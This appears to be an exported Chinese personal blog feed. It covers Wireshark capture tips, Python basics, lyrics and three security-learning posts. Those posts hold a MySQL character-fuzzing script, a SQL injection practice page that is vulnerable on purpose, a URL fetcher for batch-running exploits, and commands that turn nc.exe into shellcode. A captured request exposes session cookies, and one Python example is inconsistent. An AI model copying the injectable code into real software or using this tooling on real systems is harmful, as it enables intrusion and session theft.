<h2 id="如何得到与burp一样的包结果"><a href="#如何得到与burp一样的包结果" class="headerlink" title="如何得到与burp一样的包结果"></a>如何得到与burp一样的包结果</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div></pre></td><td class="code"><pre><div class="line">抓到包后,右键选项里的复制选项>字节,就可以得到和burp一样的包结果了</div><div class="line">随意找了一个包</div><div class="line">结果如下</div><div class="line">Xil5EX@fKF{:ePPdqP</div><div class="line">GET /pushserver3/client?ClientVer=50800000001&GUID=PC9586697ac15763679&app=ydrive&cl=desktop&client_ver=50800000001&cto=600000&device_id=PC9586697ac15763679&device_name=WHOAMI&device_type=PC&did=PC9586697ac15763679&keyfrom=pc&lp=1500408903365&os=Windows&os_ver=Windows&pv=1&subvendor=&vendor=website&vendornew=website&ver=0 HTTP/1.1</div><div class="line">Accept: */*</div><div class="line">USER-ID: ccfuc2017@163.com</div><div class="line">User-Agent: Ydrive client</div><div class="line">Host: notify3.note.youdao.com</div><div class="line">Connection: Keep-Alive</div><div class="line">Cache-Control: no-cache</div><div class="line">Cookie: OUTFOX_SEARCH_USER_ID=1951253004@123.123.62.41; YNOTE_FORCE=true; YNOTE_SESS=v2|Y4KBDH-XfWTFh4wzOfYWRJ4kMQBhLOm0J4OMPLn4py0Q4nMOM64qL0Uf6MkfnfTFR64kfgBP4OMRTLPLkMRHwyR6KhfPFnfzGR; YNOTE_LOGIN=1||1500466436384; JSESSIONID=aaaEP4FnqI5rUhLR5z30v</div><div class="line"></div><div class="line">前面会有几个乱的字符,自己手工删掉就可以了</div></pre></td></tr></table></figure>
<h2 id="对包内容进行过滤,搜索"><a href="#对包内容进行过滤,搜索" class="headerlink" title="对包内容进行过滤,搜索"></a>对包内容进行过滤,搜索</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">可以使用规则 比如下面就是只抓get的包</div><div class="line">tcp.port == 80 || udp.port == 80 && http.request.method=="GET"</div><div class="line"></div><div class="line">也可以ctrl+f 直接找string 只要关键词选的好正确,很快就ok</div></pre></td></tr></table></figure>
<p>更多学习资料:<a href="http://jingyan.baidu.com/article/7f41ececede744593c095c79.html" target="_blank" rel="external">http://jingyan.baidu.com/article/7f41ececede744593c095c79.html</a></p>
<p><a href="https://www.baidu.com/s?wd=wireshark%20%E6%95%99%E7%A8%8B" target="_blank" rel="external">https://www.baidu.com/s?wd=wireshark%20%E6%95%99%E7%A8%8B</a></p>
<p>```</p>
]]></content>
<tags>
<tag> tools </tag>
<tag> 网络安全 </tag>
</tags>
</entry>
<entry>
<title><![CDATA[python623]]></title>
<url>http://phpplay.github.io/2017/06/23/python623/</url>
<content type="html"><![CDATA[<script src="/assets/js/APlayer.min.js"> </script><h2 id="格式输出与列表"><a href="#格式输出与列表" class="headerlink" title="格式输出与列表"></a>格式输出与列表</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div><div class="line">72</div><div class="line">73</div><div class="line">74</div><div class="line">75</div><div class="line">76</div><div class="line">77</div><div class="line">78</div><div class="line">79</div><div class="line">80</div><div class="line">81</div><div class="line">82</div><div class="line">83</div><div class="line">84</div><div class="line">85</div><div class="line">86</div><div class="line">87</div><div class="line">88</div><div class="line">89</div><div class="line">90</div><div class="line">91</div><div class="line">92</div><div class="line">93</div><div class="line">94</div><div class="line">95</div><div class="line">96</div><div class="line">97</div><div class="line">98</div><div class="line">99</div><div class="line">100</div><div class="line">101</div><div class="line">102</div><div class="line">103</div><div class="line">104</div><div class="line">105</div><div class="line">106</div><div class="line">107</div><div class="line">108</div><div class="line">109</div><div class="line">110</div><div class="line">111</div><div class="line">112</div><div class="line">113</div><div class="line">114</div><div class="line">115</div><div class="line">116</div><div class="line">117</div><div class="line">118</div><div class="line">119</div><div class="line">120</div><div class="line">121</div><div class="line">122</div><div class="line">123</div><div class="line">124</div><div class="line">125</div><div class="line">126</div><div class="line">127</div><div class="line">128</div><div class="line">129</div><div class="line">130</div><div class="line">131</div><div class="line">132</div><div class="line">133</div><div class="line">134</div><div class="line">135</div><div class="line">136</div><div class="line">137</div><div class="line">138</div><div class="line">139</div><div class="line">140</div><div class="line">141</div><div class="line">142</div><div class="line">143</div><div class="line">144</div><div class="line">145</div><div class="line">146</div></pre></td><td class="code"><pre><div class="line">格式输出</div><div class="line">%d 整数</div><div class="line">%f 浮点数</div><div class="line">%s 字符串</div><div class="line">%x 十六进制整数</div><div class="line"></div><div class="line">print 'whoami %d' %(1) #这个是整数1</div><div class="line">whoami 1</div><div class="line"></div><div class="line">print 'whoami %s' %('1') #这个是字符1</div><div class="line">whoami 1</div><div class="line"></div><div class="line">print 'whoami %f' % 1.00 这个是浮点1</div><div class="line">whoami 1.000000</div><div class="line"></div><div class="line">print 'whoami %x' %(1) 这个是十六进制整数1</div><div class="line">whoami 1</div><div class="line"></div><div class="line"></div><div class="line">list 列表</div><div class="line">定义并循环输出列表</div><div class="line">>>> whoami = ['diyi','dier','laosan']</div><div class="line">>>> whoami</div><div class="line">>>> for i in whoami:</div><div class="line">... print i</div><div class="line">...</div><div class="line">diyi</div><div class="line">dier</div><div class="line">laosan</div><div class="line"></div><div class="line"></div><div class="line">输出定位元素</div><div class="line">>>> whoami[0]</div><div class="line">'diyi'</div><div class="line">>>> whoami[2]</div><div class="line">'laosan'</div><div class="line">>>> whoami[1]</div><div class="line">'dier'</div><div class="line">>>> whoami[3]</div><div class="line">Traceback (most recent call last):</div><div class="line"> File "<stdin>", line 1, in <module></div><div class="line">IndexError: list index out of range</div><div class="line"></div><div class="line">>>> len(whoami)</div><div class="line">3</div><div class="line">>>> whoami[len(whoami)-1]</div><div class="line">'laosan'</div><div class="line"></div><div class="line">添加元素</div><div class="line">>>> whoami.append('xiaosi')</div><div class="line">>>> whoami</div><div class="line">['diyi', 'dier', 'laosan', 'xiaosi']</div><div class="line">插入元素</div><div class="line">>>> whoami.insert(2,'whoami')</div><div class="line">>>> whoami</div><div class="line">['diyi', 'dier', 'whoami', 'laosan', 'xiaosi']</div><div class="line">修改元素</div><div class="line">>>> whoami[2] = 'gai'</div><div class="line">>>> whoami</div><div class="line">['diyi', 'dier', 'gai', 'laosan', 'xiaosi']</div><div class="line">删除末尾元素</div><div class="line">>>> whoami.pop()</div><div class="line">'test'</div><div class="line">>>> whoami</div><div class="line">['diyi', 'dier', 'gai', 'laosan', 'xiaosi']</div><div class="line">删除指定元素</div><div class="line">>>> whoami.pop(2)</div><div class="line">'gai'</div><div class="line">>>> whoami</div><div class="line">['diyi', 'dier', 'laosan', 'xiaosi']</div><div class="line">嵌套取值</div><div class="line">>>> cn = whoami</div><div class="line">>>> mingzi = [cn,'en']</div><div class="line">>>> mingzi[0][2]</div><div class="line">'laosan'</div><div class="line"></div><div class="line">元组 tuple 元组中的值是不可变的 无法增删改</div><div class="line">>>> yuanzu = ('1','2','3')</div><div class="line">>>> yuanzu</div><div class="line">('1', '2', '3')</div><div class="line">>>> for i in yuanzu:</div><div class="line">... print i</div><div class="line">...</div><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">>>> yuanzu[0]</div><div class="line">'1'</div><div class="line">>>> yuanzu[0] = '2333'</div><div class="line">Traceback (most recent call last):</div><div class="line"> File "<stdin>", line 1, in <module></div><div class="line">TypeError: 'tuple' object does not support item assignment</div><div class="line">单一元组的时候必须加,来消除歧义,否则会误解为数学计算中的小括号</div><div class="line">>>> t=(1)</div><div class="line">>>> t</div><div class="line">1</div><div class="line">>>> t=(1,)</div><div class="line">>>> t</div><div class="line">(1,)</div><div class="line">>>> type(t)</div><div class="line"><type 'tuple'></div><div class="line">>>> t =(1)</div><div class="line">>>> type(t)</div><div class="line"><type 'int'></div><div class="line"></div><div class="line">tuple中有变量的时候,指向不变,但是有列表时就可以变化</div><div class="line">变量不变</div><div class="line">>>> z = 'a'</div><div class="line">>>> t = ('1','2',z)</div><div class="line">>>> t</div><div class="line">('1', '2', 'a')</div><div class="line">>>> z= 'b'</div><div class="line">>>> t</div><div class="line">('1', '2', 'a')</div><div class="line">列表变</div><div class="line">>>> t = ('1','2',['1','2'])</div><div class="line">>>> t</div><div class="line">('1', '2', ['1', '2'])</div><div class="line">>>> t[2][1] = '3'</div><div class="line">>>> t</div><div class="line">('1', '2', ['1', '3'])</div><div class="line"></div><div class="line">格式转换</div><div class="line"></div><div class="line"></div><div class="line"></div><div class="line"></div><div class="line"></div><div class="line">------------------------------</div><div class="line">找到一个好东西</div><div class="line"></div><div class="line"></div><div class="line">int(x [,base ]) 将x转换为一个整数 </div><div class="line">long(x [,base ]) 将x转换为一个长整数 </div><div class="line">float(x ) 将x转换到一个浮点数 </div><div class="line">complex(real [,imag ]) 创建一个复数 </div><div class="line">str(x ) 将对象 x 转换为字符串 </div><div class="line">repr(x ) 将对象 x 转换为表达式字符串 </div><div class="line">eval(str ) 用来计算在字符串中的有效Python表达式,并返回一个对象 </div><div class="line">tuple(s ) 将序列 s 转换为一个元组 </div><div class="line">list(s ) 将序列 s 转换为一个列表 </div><div class="line">chr(x ) 将一个整数转换为一个字符 </div><div class="line">unichr(x ) 将一个整数转换为Unicode字符 </div><div class="line">ord(x ) 将一个字符转换为它的整数值 </div><div class="line">hex(x ) 将一个整数转换为一个十六进制字符串 </div><div class="line">oct(x ) 将一个整数转换为一个八进制字符串</div></pre></td></tr></table></figure>
<h2 id="python-的-条件判断与循环"><a href="#python-的-条件判断与循环" class="headerlink" title="python 的 条件判断与循环"></a>python 的 条件判断与循环</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div></pre></td><td class="code"><pre><div class="line">与其它程序没有什么不同</div><div class="line">#-*- coding:utf-8 -*-</div><div class="line">a = int(raw_input('a='))</div><div class="line">#print type(a)</div><div class="line">if a > 0:</div><div class="line"> print '世界爆炸'</div><div class="line">elif a == 0:</div><div class="line"> print '世界战争'</div><div class="line">else:</div><div class="line"> print '世界和平'</div><div class="line"></div><div class="line">for循环 </div><div class="line">for i in list:</div><div class="line"> print i</div><div class="line"></div><div class="line">最经典的累加</div><div class="line">sum = 0</div><div class="line">for x in [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]:</div><div class="line"> sum = sum + x</div><div class="line">print sum</div><div class="line"></div><div class="line">5050累加</div><div class="line">sum = 0</div><div class="line">for x in range(101):</div><div class="line"> sum = sum + x</div><div class="line">print sum</div><div class="line"></div><div class="line"></div><div class="line">奇数和的计算 while 的使用</div><div class="line">sum = 0</div><div class="line">n = 99</div><div class="line">while n > 0:</div><div class="line"> sum = sum + n</div><div class="line"> n = n - 2</div><div class="line">print sum</div></pre></td></tr></table></figure>
<h2 id="字典-dict"><a href="#字典-dict" class="headerlink" title="字典 dict"></a>字典 dict</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div><div class="line">72</div><div class="line">73</div><div class="line">74</div><div class="line">75</div><div class="line">76</div><div class="line">77</div><div class="line">78</div><div class="line">79</div><div class="line">80</div><div class="line">81</div><div class="line">82</div><div class="line">83</div><div class="line">84</div><div class="line">85</div><div class="line">86</div><div class="line">87</div><div class="line">88</div><div class="line">89</div><div class="line">90</div><div class="line">91</div><div class="line">92</div><div class="line">93</div><div class="line">94</div><div class="line">95</div><div class="line">96</div><div class="line">97</div><div class="line">98</div><div class="line">99</div><div class="line">100</div><div class="line">101</div><div class="line">102</div><div class="line">103</div><div class="line">104</div><div class="line">105</div><div class="line">106</div><div class="line">107</div><div class="line">108</div><div class="line">109</div><div class="line">110</div><div class="line">111</div><div class="line">112</div><div class="line">113</div><div class="line">114</div><div class="line">115</div><div class="line">116</div><div class="line">117</div></pre></td><td class="code"><pre><div class="line">一个key只能对应一个value</div><div class="line"></div><div class="line">dict的key必须是不可变对象。</div><div class="line"></div><div class="line"></div><div class="line"></div><div class="line">dict有以下几个特点:</div><div class="line"></div><div class="line">查找和插入的速度极快,不会随着key的增加而增加;</div><div class="line">需要占用大量的内存,内存浪费多。</div><div class="line"></div><div class="line">而list相反:</div><div class="line"></div><div class="line">查找和插入的时间随着元素的增加而增加;</div><div class="line">占用空间小,浪费内存很少。</div><div class="line"></div><div class="line">所以,dict是用空间来换取时间的一种方法。</div><div class="line"></div><div class="line"></div><div class="line">set</div><div class="line"></div><div class="line">字典中key是可以相同的,set的key却是不同的,但set不储存value</div><div class="line"></div><div class="line">set和dict类似,也是一组key的集合,但不存储value。</div><div class="line"></div><div class="line">由于key不能重复,所以,在set中,没有重复的key。</div><div class="line"></div><div class="line">重复元素会被过滤掉</div><div class="line"></div><div class="line">>>> s = set([1,1,1,1,1,1,1,1,22,2,2,2,2,2,3])</div><div class="line">>>> s</div><div class="line">set([1, 2, 3, 22])</div><div class="line">>>></div><div class="line"></div><div class="line">通过add(key)方法可以添加元素到set中,可以重复添加,但不会有效果:</div><div class="line"></div><div class="line">s.add(4)</div><div class="line"></div><div class="line">>>> s.add(5)</div><div class="line">>>> s</div><div class="line">set([1, 2, 3, 5, 22])</div><div class="line">set其实是无序的</div><div class="line"></div><div class="line">>>> s.add('234234')</div><div class="line">>>> s</div><div class="line">set([1, 2, 3, 5, 22, '234234'])</div><div class="line">>>></div><div class="line">>>> s.add(0) 添加0</div><div class="line">>>> s</div><div class="line">set([0, 1, 2, 3, 5, 22, '234234'])</div><div class="line">>>> s.add('') 添加空字符串</div><div class="line">>>> s</div><div class="line">set([0, 1, 2, 3, 5, '', 22, '234234'])</div><div class="line">>>></div><div class="line">>>> s.add() 添加空值是不可以的</div><div class="line">Traceback (most recent call last):</div><div class="line"> File "<stdin>", line 1, in <module></div><div class="line">TypeError: add() takes exactly one argument (0 given)</div><div class="line"></div><div class="line"></div><div class="line">s.remove(1)</div><div class="line"></div><div class="line"></div><div class="line">>>> s.remove(1) 删除元素,但是remove的值必须存在 </div><div class="line">>>> s</div><div class="line">set([0, 2, 3, 5, '', 22, '234234'])</div><div class="line"></div><div class="line"></div><div class="line">使用 discard 删除的话,.discard(obj)中的obj如果是set中的元素,就删除,如果不是,就什么也不做</div><div class="line"></div><div class="line">>>> s</div><div class="line">set(['a', 2, 3, 5, '', 7, 22, '234234', 989])</div><div class="line">>>> s.discard(234234234324)</div><div class="line">>>> s</div><div class="line">set(['a', 2, 3, 5, '', 7, 22, '234234', 989])</div><div class="line">>>> s.discard(22)</div><div class="line">>>> s</div><div class="line">set(['a', 2, 3, 5, '', 7, '234234', 989])</div><div class="line"></div><div class="line"></div><div class="line">set可以看成数学意义上的无序和无重复元素的集合,因此,两个set可以做数学意义上的交集、并集等操作:</div><div class="line"></div><div class="line"></div><div class="line">set([0, 2, 3, 5, '', 22, '234234'])</div><div class="line">>>> s.add(7)</div><div class="line">>>> s</div><div class="line">set([0, 2, 3, 5, '', 7, 22, '234234'])</div><div class="line">>>> s.add(989)</div><div class="line">>>> s</div><div class="line">set([0, 2, 3, 5, '', 7, 22, '234234', 989])</div><div class="line">>>> s.add('a')</div><div class="line">>>> s</div><div class="line">set([0, 'a', 2, 3, 5, '', 7, 22, '234234', 989])</div><div class="line">>>></div><div class="line">>>> s</div><div class="line">set([0, 'a', 2, 3, 5, '', 7, 22, '234234', 989])</div><div class="line">>>> b =set([2333,2,3,5,7])</div><div class="line">>>> s&b</div><div class="line">set([2, 3, 5, 7])</div><div class="line">>>> s |b</div><div class="line">set([0, 'a', 2, 3, 5, '', 7, 2333, 22, '234234', 989])</div><div class="line"></div><div class="line">>>> s1 = set("qiwsir")</div><div class="line">>>> s1 自动拆分字符</div><div class="line">set(['q', 'i', 's', 'r', 'w']) </div><div class="line"></div><div class="line">set.pop()是从set中任意选一个元素,删除并将这个值返回.但是,不能指定删除某个元素.</div><div class="line"></div><div class="line">从另外一个set中合并过来元素 使用 set.update update只能用于增加字符串 ,用于整数等类型就会报错</div><div class="line"></div><div class="line">>>> s1.update('whoami')</div><div class="line">>>> s1</div><div class="line">set(['a', 'i', 'h', 'm', 'o', 'q', 's', 'r', 'w'])</div><div class="line"></div><div class="line">set 最常用的地方应该就是交并集合 ,比较,或者统计了</div><div class="line"></div><div class="line">set.clear(),清空</div></pre></td></tr></table></figure>]]></content>
<tags>
<tag> python </tag>
</tags>
</entry>
<entry>
<title><![CDATA[php fuzz]]></title>
<url>http://phpplay.github.io/2017/06/15/php-fuzz/</url>
<content type="html"><![CDATA[<script src="/assets/js/APlayer.min.js"> </script><h2 id="php-mysql-fuzz"><a href="#php-mysql-fuzz" class="headerlink" title="php mysql fuzz"></a>php mysql fuzz</h2><p>上周因为一个注入,让我有研究了一下fuzz方面的东西,所以从网上找了几个脚本,另外写了个批量检测的php脚本,现在记录下来。</p>
<p>第一个是对mysql的fuzz,主要测试的是chr函数的255个特殊字符放到mysql语句中会不会起到作用,这个脚本是网上找的,原文来自于wooyun zone,可惜了zone里一堆好东西现在都不见了啊。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div></pre></td><td class="code"><pre><div class="line"><?php</div><div class="line"> error_reporting(0);</div><div class="line"> /* 连接选择数据库 */</div><div class="line"> $link = mysql_connect("localhost", "root", "root123")</div><div class="line"> or die("Could not connect : " . mysql_error());</div><div class="line"> print "Connected successfully<br/><br />";</div><div class="line"> mysql_select_db("mysql") or die("Could not select database");</div><div class="line"></div><div class="line"> /* 执行 SQL 查询 */</div><div class="line"> for($i=0;$i<255;$i++){</div><div class="line"> $fuzz=chr($i);</div><div class="line"> $query = "{$fuzz}SELECT{$fuzz}{$fuzz}password{$fuzz}from{$fuzz} mysql.user {$fuzz}limit {$fuzz}1";</div><div class="line"> //$query = "SELECT 1 from mysql.user --{$fuzz}xxxxx";</div><div class="line"> $result = mysql_query($query);</div><div class="line"> $array = mysql_fetch_array($result,MYSQL_ASSOC);</div><div class="line"></div><div class="line"> /* 在 HTML 中打印结果 */</div><div class="line"> if(mysql_error()==''){</div><div class="line"> echo urlencode(chr($i))." ---- ".chr($i)."<br/>";</div><div class="line"> echo $query."<br />";</div><div class="line"> print_r($array);</div><div class="line"> echo "<br /><br />";</div><div class="line"> mysql_free_result($result);</div><div class="line"> }</div><div class="line"> </div><div class="line"> }</div><div class="line"> /* 释放资源 */</div><div class="line"> mysql_free_result($result);</div><div class="line"></div><div class="line"> /* 断开连接 */</div><div class="line"> mysql_close($link);</div><div class="line">?></div></pre></td></tr></table></figure></p>
<hr>
<h2 id="php-sql-injection"><a href="#php-sql-injection" class="headerlink" title="php sql injection"></a>php sql injection</h2><p>第二个脚本是用来练注入的,需要配置下数据库<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div></pre></td><td class="code"><pre><div class="line"><?php</div><div class="line"> $conn = mysql_connect("localhost", "root", "root123");</div><div class="line"> if(!$conn)</div><div class="line"> { </div><div class="line"> echo "数据库联接错误";</div><div class="line"> exit;</div><div class="line"> }</div><div class="line">if (!mysql_select_db("test")) </div><div class="line">{</div><div class="line"> echo "选择数据库出错" . mysql_error();</div><div class="line"> exit;</div><div class="line">}</div><div class="line">$tempID=$_GET['id'];</div><div class="line">if($tempID<=0 || !isset($tempID)) $tempID=1;</div><div class="line">$sql = "SELECT * FROM php_product WHERE id =$tempID";</div><div class="line">echo $sql.'<br>';</div><div class="line">$result = mysql_query($sql);</div><div class="line">if (!$result) {</div><div class="line">echo "查询出错" . mysql_error();</div><div class="line">exit;</div><div class="line">}</div><div class="line">if (mysql_num_rows($result) == 0) {</div><div class="line">echo "没有查询结果";</div><div class="line">exit;</div><div class="line">}</div><div class="line">while ($row = mysql_fetch_assoc($result)) {</div><div class="line"> echo 'ID:'.$row["id"].'<br>';</div><div class="line"> echo 'name:'.$row["name"].'<br>';</div><div class="line"> echo 'price:'.$row["price"].'<br>';</div><div class="line">echo 'image:'.$row["img"].'<br>';</div><div class="line">}</div><div class="line">?></div></pre></td></tr></table></figure></p>
<hr>
<h2 id="php-burp-geturl"><a href="#php-burp-geturl" class="headerlink" title="php burp geturl"></a>php burp geturl</h2><p>第三个脚本是自己写的,用来配合burp检测网站状态,也可用来批量执行exp等等,关键看自己怎么用了,很简单的东西,而且file_get_contents是有先天不足的,建议替换为其他函数<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div></pre></td><td class="code"><pre><div class="line"><?php </div><div class="line">/*</div><div class="line">$url = "http://".$_GET["u"]; </div><div class="line">*/</div><div class="line">$url = $_GET["u"]; </div><div class="line">$ctx = stream_context_create(array( </div><div class="line">'http' => array('timeout' => 50, </div><div class="line">'proxy' => 'tcp://127.0.0.1:8080', </div><div class="line">'request_fulluri' => True,) </div><div class="line">) </div><div class="line">); </div><div class="line">$result = file_get_contents($url, false, $ctx); </div><div class="line">echo $result; </div><div class="line">?></div></pre></td></tr></table></figure></p>
<p>这只是初步的脚本,网上有更多好东西,度娘谷哥可以帮你。</p>
]]></content>
<tags>
<tag> web安全 </tag>
</tags>
</entry>
<entry>
<title><![CDATA[自定义shellcode]]></title>
<url>http://phpplay.github.io/2017/05/24/%E8%87%AA%E5%AE%9A%E4%B9%89shellcode/</url>
<content type="html"><![CDATA[<script src="/assets/js/APlayer.min.js"> </script><p>一直在找shellcode的生成工具,想过要自己写,但是又没个思路,直到今天才找到了自己想要的东西,没想到的是08年就有人写出来了。不过也对,当时全是研究底层的大神,和现在的学习环境都不一样。<br>怀念当年绿色兵团那时候的学习氛围,想起当年我也是拿手机上邪八,绿色的人啊。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">schelper.exe -i nc.exe -en Exe -db -o s.bin</div><div class="line"></div><div class="line">测试 : schelper.exe -t -i s.bin</div></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line"></div><div class="line">schelper.exe -i nc.exe -d 1 -o s.txt</div><div class="line"></div><div class="line"></div><div class="line">成功生成shellcode</div></pre></td></tr></table></figure>
<p>下一步我要尝试学习delphi了,学习,学习,加油!</p>
]]></content>
<tags>
<tag> 网络安全 </tag>
<tag> shellcode </tag>
<tag> C </tag>
</tags>
</entry>
<entry>
<title><![CDATA[遥不可及的你]]></title>
<url>http://phpplay.github.io/2017/05/22/ni/</url>
<content type="html"><![CDATA[<script src="/assets/js/APlayer.min.js"> </script><p>遥不可及的你</p>
<p>–花粥</p>
<iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width="520" height="81" src="//music.163.com/outchain/player?type=2&id=450853439&auto=1&height=66"></iframe>
<p>如果有一天我要去流浪</p>
<p>不是因为我厌倦了家乡</p>
<p>不是难忍这里冬天太长</p>
<p>而是我终于得知了你的方向</p>
<p>如果有一天我不再感伤</p>
<p>不是因为我突然的成长</p>
<p>不是有天有人向我递一颗糖</p>
<p>而是我终于走到了你的身旁</p>
<p>我从前相信</p>
<p>这世上有一个温暖的人</p>
<p>只为我悲喜</p>
<p>为我阻挡着人间的锋利</p>
<p>为了找到你</p>
<p>从未放过任何蛛丝马迹</p>
<p>而事到如今</p>
<p>终于明白我命里没你</p>
<p>我曾遇到许多美丽故事</p>
<p>也曾以为那些是你的名字</p>
<p>我的执迷不悟感动了我自己</p>
<p>你却还是一样遥不可及</p>
<p>所以我开始向往着远方</p>
<p>想去那些曾经有你的地方</p>
<p>可我未曾想过的人海茫茫</p>
<p>让我没日没夜迷失方向</p>
<p>我从前相信</p>
<p>这世上有一个温暖的人</p>
<p>只为我悲喜</p>
<p>为我阻挡着人间的锋利</p>
<p>为了找到你</p>
<p>从未放过任何蛛丝马迹</p>
<p>而事到如今</p>
<p>终于明白我命里没你</p>
<p>我从前相信</p>
<p>这世上有一个温暖的人</p>
<p>只为我悲喜</p>
<p>为我阻挡着人间的锋利</p>
<p>为了找到你</p>
<p>从未放过任何蛛丝马迹</p>
<p>而事到如今</p>
<p>终于明白我命里没你</p>
<p>wo zai zhe li a , ni you zai na li ?</p>
]]></content>
<tags>
<tag> 生活 </tag>
</tags>
</entry>
<entry>
<title><![CDATA[祝天下有情人终成兄妹]]></title>
<url>http://phpplay.github.io/2017/05/20/%E6%84%BF%E5%A4%A9%E4%B8%8B%E6%9C%89%E6%83%85%E4%BA%BA%E7%BB%88%E6%88%90%E5%85%84%E5%A6%B9/</url>
<content type="html"><![CDATA[<script src="/assets/js/APlayer.min.js"> </script><p>先来一个我喜欢的up主的视频,看得我都想谈恋爱了,我Jay威武!北京巡回演唱会不知道有没有人组团去啊!!!</p>
<embed height="415" width="544" quality="high" allowfullscreen="true" type="application/x-shockwave-flash" src="//static.hdslb.com/miniloader.swf" flashvars="aid=10672935&page=1" pluginspage="//www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash">
<p>再来个虐狗的 - - , 有没有人被暴击到?</p>
